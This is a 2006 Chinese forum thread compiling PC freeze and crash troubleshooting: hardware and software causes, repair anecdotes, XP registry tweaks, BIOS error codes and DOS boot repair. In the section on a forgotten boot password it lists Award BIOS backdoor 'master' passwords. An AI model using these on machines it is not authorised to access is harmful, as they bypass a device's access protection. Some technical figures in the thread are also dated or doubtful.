2006-6-24 10:35:20　编辑 删除　IP：已记录

Re:电脑<<死机>>全集
seiyas
版主

角色：论坛版主
等级：侠之大者
公会：赛雅万维办公室
发帖：278
经验：487
金币：487
注册：2006年6月4日

信息 日志 短讯 邮箱 好友 搜索 引用 回复 No.6

--------------------------------------------------------------------------------

不兼容导致的死机故障
电脑最近总是显示内存不足，每运行约一个小时后，就会突然出现蓝屏故障。启动重新开机后要不了多久，故障现象依然出现。

    在使用多个杀毒软件交叉杀毒，又重装了系统后故障依然存在，所以笔者开始怀疑不是病毒或Windows安装错误引起的。在开机半小时左右即将出现蓝屏现象前查看任务列表，发现此时内存中共加载了上百个名为“Winoldap”的进程，查阅该软件和微软的说明文档，原来这是一个与DOS应用程序兼容性有关的问题。

    原来，我使用了一个Win95时代开发的系统集成软件。该软件在运行过程中，不断地从接口上读取以压缩包形式传送的外部信息，系统每读进一个压缩包，就会自动调用附带的PKunzip程序去解压缩，而PKunzip是DOS环境下的应用程序，完成任务后不会自动退出，于是此程序不断地驻留于内存中，一定时间后就会导致内存资源严重耗尽，最终出现蓝屏现象。明白了原因后，简单的设置就可以解决问题：找到PKunzip.exe程序，在属性里单击“程序”，选中“禁止MS-DOS程序检测Windows”前的复选框，确认，再试运行故障消失。

    除了这种禁止检测的方法外，如果你使用的是WinXP，还可以使用兼容模式来运行该程序，WinXP会为这些老程序自动加载虚拟机。看来，遇到怀疑是病毒破坏、但杀毒软件处理不了的故障，要看看是不是Windows与以前的程序兼容性引起的问题。虽然蠕虫类病毒经常会打开无数进程占用系统资源导致死机，但Windows显示资源耗尽后死机，不一定就是病毒引起的

预防死机的小技巧

计算机病毒感染、黑客攻击、“千年虫”发作、使用操作不当，或者频繁地安装和删除各种各样的应用程序，都会引起系统不能正常启动。为预防起见，应经常将下列与系统启动有关的关键文件拷贝到第二个硬盘或软盘中以备使用。

C:\目录下的Autoexec.bat、Autoexec.dos、Config.sys、Config.dos、Msdos.sys

C:\Windows\目录下的Control.ini、System.ini、Win.ini、System.dat、User.dat

一旦机器无法正常启动，设法将上述文件拷贝回原来的目录中，往往可以起死回生

解决死机故障

无论是兼容机还是器牌机，在使用过程中都会出现莫明其妙的死机现象。死机是一种较常见的故障现象，同时也是一种不容易解决的疑难病症。特别是当电脑死机后，此时我们无法使用软件或工具对机器进行检测，维修起来常常令人头痛。

一.死机一般表现为：

    1)加电后没有主机没有任何反应，电源指示灯不亮，风扇不转；

    2)系统不能正常启动，在启动过程中突然画面停滞；

    3)在启动过程中显示器黑屏或在使用过程中显示器黑屏；

    4)图像"凝固"，不进行更新，但键盘灯能够打开和关闭；

    5)键盘锁死没有反应；

    6)鼠标能够正常移动但是主机没有反应；

    7)软件运行非正常中断；

    8)经常的出现蓝屏。

    9)经常报内存错误或溢出。

    我们如何才能迅速的解决故障，让机器恢复正常工作呢？

二.故障表现

    具体来说，死机现象可分为硬件和软件两种情况。:

1.硬件

    硬件造成的死机常常有：市电电压不稳，主机电源输出电压过低或过高，机箱内的温度过高，内存温度过热，CPU温度过高，超频，干扰，外设自身有故障，板卡接触不良，主机与外设连接的数据线接触不良等。

    （1） 市电电压不稳

    计算机电压工作范围一般在180V-240V之间，当电压低于180V时，开关电源输出电压过低或保护，这时主机容易重启或自动关机；当电压高于240V时，市电输入电压超过了主机电源的允许工作范围，但由于电路的元器件的离散性，此时电源可能还没有保护，这时次级电源输出可能偏高，同样也会造成死机现象。

    （2） 主机电源不完全损坏

    当主机电源内部电路损坏时，这时的电压输出可能有偏差或电流输出不足，造成有效负荷率不足，这时也会产生死机现象。目前电脑主机使用的开关电源大都使用TL494或相类似的PWM控制芯片，比较器一般采用LM339或LM393来控制判断主机是否发送开关机信号。该芯片有故障时，会出现我们用导线短路绿线和黑线后（有的书上要求使用100O电阻，其实没有必要，电源内部电路中已经串接了2K左右的电阻，即使把其短路，电流也不过几个毫安），电源的风扇工作，用万用表测各路输出电压也基本正常。但是接入电路后，电源不能正常工作。这主要是该芯片损坏后，电压取样有误，不能隽带重负载所致，只要更换同型号芯片即可。

    我遇到过一次，一台杂牌开关电源，使用一年半左右后，主机经常死机或不能启动，最后检查开关电源，发现输出的＋5V高达5.86V，而＋12V却只有9.9V，像这样的电源不死机才怪呢，还好，没有把主板烧毁。
    （3） 机箱内的散热不良

    机箱内灰尘过多也会导致系统死机。灰尘是电脑的大敌，过多的灰尘附着在CPU、芯片、风扇的表面会导致这些元件散热不畅或接触不良；同时印刷电路板上的灰尘在潮湿的环境中常常导致短路。两种情况均会导致死机现象。这种情况常见于一些老的电脑在放置一年或两年后再打开时就什么反应也没有了或者开机后“嘀嘀”乱叫，还有就是机器到夏季后经常出现死机现象。

    因为PIV电脑的CPU的温度传感器集成在CPU内部，其测温准确，所以一开机CPU温度一般都在50左右，远远高于SOCKET　370　CPU的检测温度（30左右）。不过，因为PIVCPU的发热量大，在选用CPU风扇时一定要根据CPU的型来选择相应的CPU风扇，别让出现小马拉大车的情况，否则死机不断。

    解决方法：我们可以用毛刷将灰尘扫去，再用电吹风（冷风档）把板卡的灰尖清理干净。

    注意：不要将毛刷和棉签的毛、棉留在电路板和元件上成为新的死机故障源。如果我们能够一年清理一次主机和显示器内部的灰尘，我们的爱机就不会无缘无故的罢工了。

    （4） 超频

    许多DIY朋友喜欢通过超频来提高自己电脑的性能，这样可以少花银子多办事。但是也存在着很大的隐患：轻则造成死机，重则可能造成CPU，内存，硬盘的彻底报废。

    我就有过一次超频的经历，把66外频的主板硬超上83外频，刚开始使用效果不错，当我我正在为自己的小试牛刀而沾沾自喜时，两天后，突然在运行时，系统提示找不到硬盘。开始我还不在意，然后越来越频繁，最后在CMOS里也找不到硬盘了。特别现在的P4CPU其集成度越来越高，有的已经采用0.09微米的线路，当我们超频使用时，很容易造成CPU内部电子过量衰减，最后连接线路彻底断裂，造成CPU报废。

    （5） 主板跳线错误

    有的主板的外频和倍频使用路线或拔码开关，CPU或内存的供电电压选择使用跳线设置，这时我们要根据说明设置相应CPU的主频倍频参数和相应的使用电压。如果设置不对就可能对CPU造成超频，设置参数过高时，就可能黑屏或一进系统就死机。有时我们在对CMOS放电后没有把跳线跳回原来位置，这时在加电启动时就会黑屏不启动。有的主板同时支持SD和DDR两种内存，注意在主板上有跳线选择＋2.5V和＋3.3V两种电压设置。特别是CPU的核心电压设置一不能出现错误，否则极易造成CPU报废。

    （6） 外设内部电路损坏

    当外设如显示器，打印机，M等内部电路损坏时，再与主机连接后，会短路其相应端口，这时主机加电自检时就不能通过或造成电源保护。有的刻字机，编程器在先于主机加电后，这时主机加电后不能启动。
（7） 与外设连接的数据线接触不良。

    外设与主机的数据线连接有松动时，也可能造成数据在传输过程中出现中断或错误，同样会造成机器无规律的死机。

    （8） 硬件质量不良或假货，水货。

    硬件质量不过硬，在长时间工作或工作环境温度过高或过低时，也会出现死机现象。特别是一些REMARK的电脑产品，装在自己电脑上出现毛病，最好查来查去也查不出问题所在时，这时最好考虑一下是不是买到JS的货了。

    前一段时间有不少酷鱼40G的硬盘，买到家还不到一个星期，就出现坏道。然后FORMAT后就正常了，但是过一段时间故障再次出现，然后是越来越严重，有时还会莫明其妙的丢数据。

    （9）意外损坏

    我们在维修过程中没有泄放身上的静电或雷击电流通过未经保护的电源及MODEM电话线进入主机，损坏电源、主机板、MODEM及各种内外设备。意外损坏后有时元器件表面没有明显的烧，裂痕迹，这时只能通过交换法、拔插法测试主机各部件的好坏来判断。

    （10）干扰

    现在家里都有许多家用电器，特别是是变频空调，洗衣机，电磁炉等，这些电器在工作时会向空气中幅射大量的电磁波，如果电脑就在附近，那么也可能出现莫名其妙的死机或蓝屏现象。这时我们最好把电脑换一个地方试试。

    （11）内存损坏或不兼容

    当内存内部出现坏块时或与主板的兼容性不好时，也会经常出现：注册表错误，内存报错，蓝屏，系统资源不足，然后死机。

    现在的主机的功能越来越方便，如键盘开机，密码开机，STR等。殊不知，功能越多，其出现故障的可能性就越大。特别是STR功能，当把机器的该项功能打开时，我们选择睡眠时，这时系统就把当前的设置保存在内存中，然后把其他部分的电路关闭，只有副电源工作和内存相关电路工作。在睡眠期间，内存不断的刷新，其中的内容不会丢失。不过如果在夏季，因为每条内存的功率大概在20W左右，长时间的睡眠时，就会造成热量积聚过多，散不出去，最后把主机电源或内存烧毁

2．软件

    软件引起死机的故障有很多，如病毒，驱动程序安装错误，驱动程序与系统或其他软件冲突，CMOS设置错误，CONFIG.SYS或AUTOEXEC.BAT配置不正确，WIN.INI或SYSTEM.INI文件加载的文件丢失或被破坏，加载的程序过大过多，系统剩余资源太少等。

    （1） 病毒

一般表现为机器原起初能够正常运行，某一日突然运行速度变慢，出现频繁的死机现象。这时我们要首先用最新的杀毒软件进行杀毒，确定机器是否已经感染了病毒。现在的电脑病毒层出不穷，传播方式大都倾向于通过网络传播，因此我们在上网时，一定要安装网络杀毒软件，并且把一些开放的不常用的端口关闭。

    （2） 驱动程序安装错误

    硬件的驱动程序安装错误或硬件自身的驱动程序有BUG时，也会造成死机现象，这时需要检查所安装的硬件的驱动程序是否与硬件的型号或核心芯片型号相匹配。如果可以，到网上下载最新的该硬件的驱动程序。

    （3） CMOS设置错误

    CMOS的内容如CPU主频，倍频，内存的刷新时间，L1，L2是否打开，ECC校验或偶校验，15-16M等，以上内容设置错误时，会明显的感到主机的运算速度变慢，最后死机。

    当把CMOS设置中的“Anti Virus”或“Virus Warnning”病毒防护功能打开时，我们在安装WIN9X软件过程中就会产生死机现象，因为这时系统阻止了程序向主引导区和C盘的BOOT区的写操作指令。

    由于频繁修改CMOS参数，或病毒对CMOS参数的破坏，常常导致CMOS参数混乱而很难恢复。可以采用对CMOS放电的方法并采用系统BIOS默认设置值重新设定CMOS参数。CMOS的放电方法可参照主板说明书进行。重设CMOS参数后，还必须对硬盘杀毒。

    对CMOS可以取其默认设置，如"LOAD SETUP DEFAULT"和"LOAD BIOS DEFAULT"；
    （4） CONFIG.SYS或AUTOEXEC.BAT文件配置不正确

    如果是在软件安装过程中死机或安装完后某软件后在重新启动时死机，一般是系统的某些配置与所安装的软件不匹配。这时可试着对CONFIG.SYS和AUTOEXEC.BAT中的相关驱动程序设置进行修改。

    对CONFIG.SYS和AUTOEXEC.BAT还可在启动时按F5跳过系统配置文件或按F8选择逐步执行CONFIG.SYS和AUTOEXEC.BAT中选项，以检查是某一驱动程序或加载文件的问题，尤其是EMM386中关于EMS、XMS的配置情况，我们可以此来判断故障的原因；

    一些硬件驱动程序和内存驻留程序则可以通过不装载它们的方法来避免冲突。

    对于WIN9X操作系统，已经不再需要上述两个文件的支持便可以正常启动系统，这两个文件主要是为了保留对原DOS程序的支持和兼容。

    （5） WIN.INI和SYSTEM.INI文件中需要加载的文件丢失或破坏。

    如果WIN.INI和SYSTEM.INI中需要加载的文件被破坏或丢失，在系统启动过程中也会出现只有光标长时间的闪烁，键盘，鼠标均没有反应的情况。不过大多数出现的是提示某一个文件无法找到。这时我们可以根据提示来找回该文件或在WIN和SYSTEM文件中把相应的选项删除。

    如果是突然有一次开机后系统不能启动，这时我们可以使用SCANREG/RESTORE命令来恢复某一天的注册表试一试。

    （6） 软件有冲突或不兼容

    随着操作系统的适用性越来越方便，其程序和指令也越来越庞大，不同软件在运行时难免有冲突不不兼容的地方。有时防病毒软件的初期版本可能在设计时就有小BUG，所以当用户安装后就会出现主机不能关机，系统启动缓慢，蓝屏死机等问题。这时我们只要把该软件关闭或卸载就可以了。判断的标准是如果在安装某一软件时系统工作正常，而当安装完某一软件后系统不正常了，那么问题肯定是该软件造成的。

    （7） 加载的程序过大过多或系统资源太少

    如果主机配置太低或启动的应用软件过于庞大时，也会产生死机现象。这时可以在我的电脑属性里，选择“用户自己指定虚拟内存设置”，把系统虚拟内存加大为物理内存的两倍或更多。解决的主要方法还是根据机器的配置选择相应的应用软件。

    （8） 网络问题

    有时候网络不正常也会造成死机现象。现在流行的联众，传奇等网络游戏，如果网络不正常，在与服务器通讯过程中也会产生死机现象。有的表现为在上网过程中死机，有的表现为掉线后死机

2006-6-24 10:37:29　编辑 删除　IP：已记录

Re:电脑<<死机>>全集
seiyas
版主

角色：论坛版主
等级：侠之大者
公会：赛雅万维办公室
发帖：278
经验：487
金币：487
注册：2006年6月4日

信息 日志 短讯 邮箱 好友 搜索 引用 回复 No.7

--------------------------------------------------------------------------------

三．解决方法

    电脑故障的解决基本原则：先软后硬，先外后内，先主后从，最小系统，逐一替换。

四．举例说明

    （1）一台联想PII400主机，在安装完瑞星杀毒软件后，启动速度变慢。打开一个应用软件，如WPS2000，竟然要花30分钟时间。仔细测试，不但打开应用软件时间长，在使用打印机打印文档时，打印一张A4纸，也要花接近10分钟的时间。分析故障出现的前后情况，最后把瑞星杀毒软件卸载后，系统恢复正常。

    今年新上市的＊＊＊＊2003杀毒软件也还存在着不稳定和不兼容的情况，安装后经常会出现蓝屏或死机情况。

    我们在安装杀毒软件时，最好在应用软件安装完好，最后再装杀毒软件，以尽可能减少不兼容或冲突的产生。

    （2）一台PIII800主机，采用小型紧凑机箱，在每年7，8月份，经常出现突然关机，再开机无效。必须把电源拔下来过几秒外后插上再开机才能启动。这种故障主要是因为机箱小，内部空间狭窄，再加上使用一年多以后，灰尘过多，空气流动不畅，致使主板，CPU，电源产生的热量散不出去，最后造成电源保护或死机。最后打开机箱，为CPU和电源除尘后故障排除。

    （3）一台CII566主机，刚在电脑公司装好的机器，一放到客户的办公室里，用不了半个小时就蓝屏死机。此问题从公司到客户的办公室里往返了好几次，都是在公司正常，一到客户的办公室里就死机。最后检查发现，电脑的上方就是一台正在工作的空调。最后把电脑搬离空调一定距离后，故障排除。

    （4）一台PIV2.0机器，客户刚买回家没两天，在使用睡眠三个小时后，无论怎么按键盘，鼠标也不能唤醒。这种问题主要是用户无意中把CMOS设置中的STR功能打开（设置为S3），然后使用睡眠后，导致电源过热烧毁。最后更换电源故障解决。

    （5）一台P166G的脑，在安装完RealPLay后，系统提示重启后，当出现蓝天白云后就再也没有反应。这个问题可能是166MMX机器上安装的软件与RealPLay软件有冲突或者是缺少RealPLay软件需要的文件，造成在启动时出现死机现象。最后进入安全模式，把RealPLay卸载后，就可以正常启动

寻找死机故障“真凶”

CPU可以说是计算机中最精密的硬件，小小的身躯内，保护了数以千万计的晶体管。因此，它对工作环境的要求也是比较严格的。

电脑用户大都会有这样的体会，计算机在使用一段时间后，开机时会出现非常大的噪音，如果电脑摆放在灰尘比较多的屋子里，这个问题则更为突出。对此现象，大多数用户都采取了放任的态度，虽然声音大些，但是不影响正常工作即可，而且一般噪音在开机一段时间后会减弱。噪音的产生是由于CPU或电源风扇积聚过多灰尘所致。必须要说明的是，此类问题同样可能影响机器的正常工作，由风扇引起故障的例子也是比较常见的。

前些天，朋友打电话告知，他的机器总是无故死机，重装操作系统也不能解决，笔者只好亲自去查看。朋友的机器配置如下：赛扬 300A CPU/杂牌BX主板/128MB现代PC 100内存/希捷20GB硬盘/杂牌TNT显卡。刚一开机，嗡嗡的噪音大作，朋友解释说这种噪音已经有一段时间了。然后机器自检、读取设备列表、启动Windows，一切正常。在Windows中运行一些小的程序，开始没有什么问题，但没过多久就开始死机。重新启动机器，在运行中频繁死机。根据以往经验，死机多半是由于内存出现问题，于是笔者把自己的内存拿过去试验，一段时间之后仍然出现死机。于是将目光转向硬盘，鉴于希捷的硬盘发热量较大，用风扇直吹硬盘予以降温，结果故障依旧。此时笔者觉得可能是系统本身出现问题，怀疑系统维护的不好，造成系统混乱。重新安装Windows 98，成功安装后一段时间仍然死机。

看来问题很可能发生在CPU身上了，难道是由于CPU过热引起的死机？笔者先启动机器，运行了一会，关机后用手接触CPU表面，发现只是微温，没有任何过热的迹象。笔者又将自己的CPU换到朋友的主板上，结果运行了很长时间都没有问题。难不成是朋友的CPU坏了？将他的CPU装到我的机器上，结果也没有问题，实在令笔者奇怪。忽然笔者想到，因为朋友的CPU风扇噪音太大，所以笔者测试时一直使用自己的CPU风扇，会不会是风扇的问题呢？将朋友的风扇除尘、清理、上油，再重新装上，嗡嗡的噪音没有了，故障也随之消失。

后来笔者仔细考虑，认为之所以会频繁死机，是因为风扇灰尘太多，干扰了正常运行，产生噪音的同时还会大大降低风扇转速，影响降温效果，使得内存或CPU不能正常工作，才会出现死机的状况。因此，不要小看小小的灰尘，有时它们也会导致很大的问题

Win XP“死机”也玩个性

使用Windows XP系统的朋友电脑死机的几率比以前大大减少，但是由于种种原因，电脑有时会长时间没有响应，形同死机。其实，电脑并非真正死机，而是处于一种假死的状态罢了。检验方法是：按下数字区的Num Lock键，如果指示灯有反应，就说明是假死机。这时，我们可以按下“Ctrl+Alt+Del”组合键，在“Windows任务管理器”里执行“结束任务”。不过有时候这招也不是很灵，虽然出现了“正在关闭……”的提示框，系统还是会很长时间没有反应。能不能给系统来点个性化设置，让“死机”变得聪明、快速呢?随我来。

    在“开始→运行”中输入“regedit”打开“注册表编辑器“，对注册表做如下修改：

    1.设定程序出错时的等待时间

    打开“HKEY_CURRENT_USER\Control　Panel\desktop”，在右边的窗口中找到“HungAppTimeout”，将该键值修改为2000，单位是毫秒。

    2.加速关闭应用程序

    打开“HKEY_CURRENT_USER\Control Panel\Desktop”，在右边的窗口找到“WaitToKillAppTimeout”，将该键值修改为10000，单位是毫秒。

    3.允许强行关机

    打开“HEKY_USERS\.DEFAULT\Control Panel\desktop”，在右边的窗口找到“AutoEndTasks”，将该键值修改为1。

    4.系统死机时自动重启

    打开“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl”，在右边的窗口中找到“AutoReboot”，将该键值修改为1。

    经过以上的修改，你会发现系统在“死机”时变得聪明了许多

2006-6-24 10:39:22　编辑 删除　IP：已记录

Re:电脑<<死机>>全集
seiyas
版主

角色：论坛版主
等级：侠之大者
公会：赛雅万维办公室
发帖：278
经验：487
金币：487
注册：2006年6月4日

信息 日志 短讯 邮箱 好友 搜索 引用 回复 No.8

--------------------------------------------------------------------------------

电脑自行热启动的几种原因

电脑的自行热启动非常令人头痛，因为没来得及存盘，即将完成的设计也就前功尽弃，白忙活了。现将其发生的原因归纳如下：

    (1)可能是病毒的干扰，立刻用最新的杀毒软件进行杀毒。

    (2)可能是计算机电源的输出电压不稳定，建议最好找专业人员测试一下。如果是市电输入不稳定则可以考虑买一个稳压器进行稳压后再输入计算机。如果是电源故障(如电源内部电容的软击穿造成短路而产生自保护)的话，赶紧更换，以免造成更大的损失。

    (3)CPU散热不良、温度过高造成热启动，检查风扇转动是否正常，应该及时清洁风扇并且使用质量好的润滑油。

    (4)需要电源供电的外设太多(如光驱、USB设备等)，运行时的实际功率超过了电源的额定功率，过载能力较差的电源就会产生自保而重启，建议更换高品质大功率电源。

奇怪的电脑重启故障
一般电脑出现重启故障都是因为电源供电不足，市电电压不稳而造成供电不正常，或者电脑外设有电路故障等原因。但是笔者这次遇到的却是主板原因造成重新启动故障。

    配置：捷波P4 MFM主板、256MB现代DDR、40GB西捷酷鱼、小影霸7900Ti 64MB DDR、长城300W P4电源。

    故障现象：客户新配的电脑，该电脑有时会重启，说不准时间，有时开机就重启，有时使用一天也不重启。

    故障解决：笔者到客户家检查，电脑使用了一个下午也没有重启一次。估计电脑硬件没有什么问题，但还是为客户重装了系统，并升级了杀毒软件。可是没多久，客户又打电话说，还是老样子，笔者判断这种情况很有可能是客户家里的电源线路有问题。笔者原来碰到过这样的问题：如果电脑和冰箱、空调等定期启动的家用电器使用一条线路时，当上述电器启动时，会产生接近其正常工作时10倍的电流，这时该线路的电压会明显下降。当低于170V时，电脑就会重启。

    另外如果该客户家的进户线有接触不良的情况，当家用电器长时间工作时，有虚接的地方因为接触电阻大，便会发热，当热量积聚到一定程度时，接触在一起的导线会受热膨胀而瞬间分离，这时也会产生重启现象。鉴于上述原因，笔者这次去客户家时自带了个UPS电源，仔细检查线路，电脑是单独电源引线应该不存在笔者估计的问题。因为故障现象没有规律出现，最后就把UPS给客户留下使用。

    第二天早晨一上班，客户就打电话来说还是出现重启。没办法，笔者把电脑运到公司拆机检查，把主板、显卡、电源、硬盘放在测试台上逐一进行检测。测试中，笔者无意动了一下电源线，主机马上重启了。笔者发现只要用手动一下电源线，电脑就会马上重启。最后仔细检查，发现P20ATX电源插座的一脚Power-on脚与主板锡盘存在虚接，有一圈很轻微的裂纹。原来是它在作怪啊!由于在保修期内，笔者为客户换了个同型号的主板，给客户送去。重启故障再也没有出现了。

19个主动报错的电脑启故障现象分析

启动电脑，如果发现问题，就会主动报错。主要有以下一些信息显示：
（1）Bad CMOS Battery说明：主机内的CMOS电池电力不足。
（2）Cache Controller Error说明：Cache Memory 控制器损坏。
（3）Cache Memory Error说明：Cache Memory运行错误。
（4）CMOS Checks UM Error说明：CMOS RAM存储器出错，请重新执行CMOS SETUP。
（5）Diskette Drive Controller Error说明：该错误信息出现的原因有：一是软盘驱动器未与电源连接； 二是软盘驱动器的信号线与I/O卡之间的连接不正确；三是软盘驱动器损坏；四是多功能卡损坏；五是 CMOS里软驱参数设置错。

（6）Display Card Mismatch说明：主机内装显示卡与系统设定值不匹配。

（7）Equipment Config Ration Error 说明：硬件设备参数不合，重新设置CMOS。

（8）Fixed Disk Controller Error说明：该错误信息出现的原因可能是：一是硬盘未接电源；二是硬盘信号线与I/O卡之间的连接不正确；三是硬盘已损坏。

（9） Fixed Disk 0 Error说明：硬盘0磁道损坏。

（10）Insert System Diskette, Press ENTER Key To Reboot说明：没有系统引导盘。

（11） I/O Parity Error说明：输入输出程序无法正确运行。

（12）Keyboard Error说明：键盘连接错误或键盘损坏。

（13） Memory Error说明：主板上DRAM、SIMM或附加的内存条损坏。

（14）Memory Size Mismatch说明：系统检测到的内存条容量与实际不符。

（15）Press Fl To Continue or Ctrl+Alt+ESC For SETUP说明：系统设定错误。

（16） Protected Mode Test Fail说明：CPU保护模式错误。在该情况下，系统仍可在实模式(Real Mode)DOS环境下运行。

（17）RAM BIOS Not Exist说明：当用户想启动SHADOW RAM，但SHADOW RAM不存在。

（18）RAM Parity Error说明：主板上DRAM或SIMM无法正常运行。

（19）Real Time Clock Error说明：时钟设定不正确。
16、缺少COMMAND.COM 文件造成的故障排除方法。
出现“Bad or missing command interpreter (解释命令出错或丢失)”信息时，怎么办？由于操作系统每次开机时，都需要引导两个隐含的系统文件(IO.SYS、MSDOS.SYS)及COMMAND.COM文件，从而完成机器的启动。出现以上问题是由于引导盘里缺少COMMAND.COM 文件所造成的。解决方法是：拷贝一个COMMAND.COM文件到硬盘上，则故障消失。换一张完好的系统盘引导机器（必须要与您硬盘上的系统版本一致）；使用系统盘的Copy命令，格式为：COPY COMMAND.COM C:\
17．硬盘引导记录损坏引起的故障排除。

出现“Disk boot failure,Insert systemdisk”(硬盘引导记录损坏，插入系统盘)信息时，怎么办？若出现此类信息，表明系统引导区受损或遭到病毒侵袭，此时比较保险的方法是通过确认无病毒的系统软盘启动，使用系统软盘上的FORMAT命令(格式为：FORMAT C:/S/U )，对硬盘的引导记录进行复写，但是您要注意，此命令也把 C盘上的信息一扫而空了。
18．缺少两个隐含文件造成的故障及排除方法。

出现“ Non - systemdisk or disk error. Replace andstrike any key when ready.(非系统盘或磁盘出错，换一张软盘，当一切准备好时，按任意一键)”信息时，怎么办？由于操作系统每次开机时，都要引导两个隐含文件IO.SYS、
MSDOS.SYS，和COMMAND.COM 文件，从而完成机器的启动。出现这一问题是由于缺少这两个隐含文件所造成的。解决方法是：换一张完好的系统盘引导机器；用SYS.COM 命令(格式为：SYS C: )拷贝IO.SYS及MSDOS.SYS两个隐含文件到硬盘上，则故障消失。
19．开机密码丢失后的解救办法。
如果您忘记了BIOS设置的开机密码，那怎么办呢？不要紧，事情总有解决的办法。从 586电脑开始，主板上都设有BIOS口令屏蔽跳线，只要找到该跳线，再按照说明书的操作方法去做，就可以轻松地把口令给去掉了。但是如果您的电脑是486 那又怎么办呢？先别灰心，查看一下主板的BIOS是否是 AWARD公司出品的，如果是，您不妨试一试以下的几个万能密码：（ 1）Syxz；（ 2）eBBB；（3）h996；（ 4）wantgirl；（ 5）Award。请注意大小写。
20．怎样把老BIOS的程序更新掉？

在586 级的电脑上，一般主板都提供了升级BIOS的功能，具体的细节请查阅相关主板的操作手册，以下只作简单的介绍。首先，打开机箱，将BIOS可擦写跳线设置为ENABLED(路线的位置请查阅手册)，默认为DISABLED。用不含CONFIG.SYS和AUTOEXEC.BAT的启动盘启动计算机。将随主板带的磁盘插入计算机软驱，启动PFLASH。当程序启动后，选择 3。再选择 2。这时程序将提示你给出BIOS文件名，您只要键入所要升级的文件的文件名(注意给出完整路径)，然后按 Y，再按ESC键，再按 N，再按ESC，关机。别忘了将跳线跳回原样，重新开机，一切大功告成了。
21．不能正常引导的11种故障现象分析及排除。
操作系统在使用中，往往会发生各种各样的故障，有时开机不能正常进入操作系统，也就是机器不能正常引导；伴随着故障，有时屏幕上会出现相应的信息，有时又没有提示。怎样从PC机的引导过程看不引导故障？下面我们从开机的过程来分析一下不引导的各种现象。
（1）开机后，系统有显示，检测内存完毕后，出现“Wait”,过很长一段时间后，出现“HDD Failed”或“FDD Failed”，屏幕上提示硬盘设置错或软驱设置错，按F1向下执行，或按Del键进入BIOS设置，此时，系统停止不动，按 DEL 键进入BIOS设置，检查一下硬盘、软驱设置是否正确，若不正确，修正过来。若是检测不到硬盘，说明硬盘有故障。设置完毕后，保存设置参数后退出，就可以进入系统。
（2）开机后，内存检测完毕，系统报键盘错，不向下运行了。此时，先关机，看键盘是否插好，若没插好，重插一下再开机，看是否能排除故障。若故障依旧，说明键盘或主板有问题，需更换其中之一来排除报键盘错的故障。
（3）开机后，内存检测完毕后，报BIOS电池失效，此时，系统停止不动了。若是新更换的主板，进入BIOS设置一下即可。若没有更换过主板，则说明主板的BIOS电池失效或者充电线路有问题，需更换一块主板来排除故障。
（4）开机后，内存、硬盘、软驱均检测通过，系统没有任何提示就停止不动了。这可能是因为硬盘没有系统文件或者系统的Io.sys、Msdos.sys文件被破坏，此时可用系统软盘启动一下，并执行一下SYS C:命令向硬盘传一下系统。
（5）开机后，报“没有系统或系统盘错误”(No systemdisk or disk error)。可能的故障原因是：A驱中的软盘非系统盘而从A驱启动； C盘上没有系统文件；即没有Command.com, Io.sys, Msdos.sys。C盘上的系统文件被破坏；硬盘介质的表面有物理损伤。
解决办法是：在软驱中插入系统盘； 执行SYS C:命令,向C盘上传一下系统；维修或更新硬盘。
（6）开机后，报“磁盘启动失败”(Disk Boot failure)。这说明 C 盘上的系统文件读出错误，可能是因为隐含文件被破坏，也可能是硬盘上的DOS引导记录有错误。

解决办法如下：一是 用A盘启动，运行“Sys c:”后，再从C盘启动。二是若无法启动，则运行“Format c:/s”后，再启动系统。三是若无法启动，查一下病毒，看有无引导型病毒。四是若上述办法均无效，说明硬盘有物理损坏，需要修复或更新。
（7）开机后，报“不正确的DOS版”。(Incorrect DOS Version)。这说明硬盘上DOS系统的Command.com文件下系统中的两个隐含文件的版本不对。这种故障可能是因为在将A盘上所有文件拷入C盘时,将C盘上原有的Command.com履盖所致。这时拷入正确的Command.com文件即可。
（8）开机后，报“错误的操作系统”(Missing operatingsystem)。这说明C盘上DOS引导记录不正确，产生的原因可能是对 DOS分区没有进行格式化，或DOS 引导记录所在扇区有物理损伤。解决办法是：先对硬盘进行格式化，若不能启动 或不能进行格式化可对硬盘进行维修。
（9）开机后，报“无效的分区表”(Invalid Partitiontable)。这说明分区标志不正确，或分区所在扇区有错误。解决办法是正确地对硬盘重新分区，并设置好活动分区。
（10）有时开机不引导。这是由于病毒破坏了系统文件，更改了引导记录，破坏了文件分配表。因此若出现不能判断的不引导故障，可以先查一下有无病毒，再做其它处理。若有引导型病毒而又杀不掉时，可以用手工方法(如：Debug)将引导区重置。
（11）以上分析是在DOS系统下的故障情况，若是Windows操作系统，系统启动时，在“Starting Windows 95...”时，停止不动了，这也属于不引导。

解决方法如下：一是重新开机，启动Windows时进入安全模式，以安全模式启动Windows ，若能够启动，说明系统的硬件设备之间有冲突，需要调试一下各种设备，避免中断冲突；二是若安全模式启动不了，则需检查一下，看是否有病毒。如果有病毒，清除以后，看Windows是否启动；三是若还是无法启动，重装Windows即可；四是Windows 不能启动时，有时可反复启动多次，直到正确启动为止。这种方法的条件是，每次重启之后，系统启动的表现都会不同，即第二次比第一次所见到的启动内容多

2006-6-24 10:40:27　编辑 删除　IP：已记录

Re:电脑<<死机>>全集
seiyas
版主

角色：论坛版主
等级：侠之大者
公会：赛雅万维办公室
发帖：278
经验：487
金币：487
注册：2006年6月4日

信息 日志 短讯 邮箱 好友 搜索 引用 回复 No.9

--------------------------------------------------------------------------------

CPU散热导致死机的处理

故障现象：笔者的电脑配置为：QDI A10B主板集成声卡、赛扬Ⅱ 900MHz CPU、128MB内存、NVIDA显卡和ATX立式机箱等。冷启动能正常进入Win98，运行程序后很快就死机了，死机后重新启动计算机到开机界面时又死机。将机箱平放，计算机能正常工作，没有出现死机现象，将机箱竖放，过一会儿又死机了。
    故障分析与处理：由于笔者的电脑有一段时间没有使用，经初步判断可能是内存或显卡等与插槽的接触点生锈而接触不好所致。笔者打开机箱，清理机箱内的灰尘，取下相关板卡用橡皮将接触点仔细擦过，重新插上，但是故障现象依旧。后来拆下所有的附件再次处理，仍然不能解决问题，查看BIOS设置也没有异常。将机箱平放电脑就能正常工作，而竖放就一定会死机，估计是某个部件在机箱平放时能够良好接触，而竖放时接触不好导致死机现象出现。分别将机箱平放、竖放并认真检查各部附件的变化情况，笔者发现CPU风扇在机箱平放时能够与CPU很好接触，而竖放时CPU风扇就松动了。故障原因可能是机箱竖放时，CPU风扇与CPU接触不良，散热不好，使CPU温度升高而导致电脑死机。

